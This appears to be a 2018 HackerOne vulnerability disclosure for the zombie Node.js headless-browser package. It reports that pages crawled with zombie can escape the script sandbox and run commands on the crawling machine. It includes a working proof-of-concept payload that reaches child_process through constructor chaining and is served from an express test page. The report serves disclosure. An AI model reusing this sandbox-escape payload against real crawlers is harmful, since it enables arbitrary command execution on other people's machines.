Lucene search

K
hackeroneCris_semmleH1:389583
HistoryAug 02, 2018 - 10:47 a.m.

Node.js third-party modules: Code Injection Vulnerability in zombie Package

2018-08-0210:47:10
cris_semmle
hackerone.com
115

I would like to report a code injection vulnerability in zombie.
It allows crawled websites to access privileged APIs such as the file system or child process.

Module

module name: zombieversion:6.1.2npm page: https://www.npmjs.com/package/zombie

Module Description

Insanely fast, headless full-stack testing using Node.js

Module Stats

12,671 downloads in the last week

Vulnerability

Vulnerability Description

Attackers can insert JS code in their pages that exploit the zombiejs code injection vulnerability. If such pages are crawled using zombiejs the machine running the crawler will run arbitrary commands provided by the attacker. For comparison, jsdom disable script execution by default.

Steps To Reproduce:

var codeToExec = "var sync=require('child_process').spawnSync; " +
    "var ls = sync('cat', ['./resources/test.html']); console.log(ls.output.toString());";
var exploit = "c='constructor';require=this[c][c]('return process')().mainModule.require;" + codeToExec;
var attackVector = "c='constructor';this[c][c](\"" + exploit + "\")()";
// end exploit

var express = require('express');

var app = express();

app.get('/test', function(req, res) {
    res.send("<script>" + attackVector + "</script>");
});

app.listen(3000);


const Browser = require('zombie');

// We're going to make requests to http://example.com/signup
// Which will be routed to our test server localhost:3000
Browser.localhost('example.com', 3000);


const browser = new Browser();
browser.visit('/test', function(a,b) {
});

Patch

N/A make user aware of this issue and offer a way to disable script execution on untrusted crawled pages.

Supporting Material/References:

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Impact

Analysed webpages can execute privileged commands on the machine running zombiejs. This is especially important if zombiejs is used for building a crawler.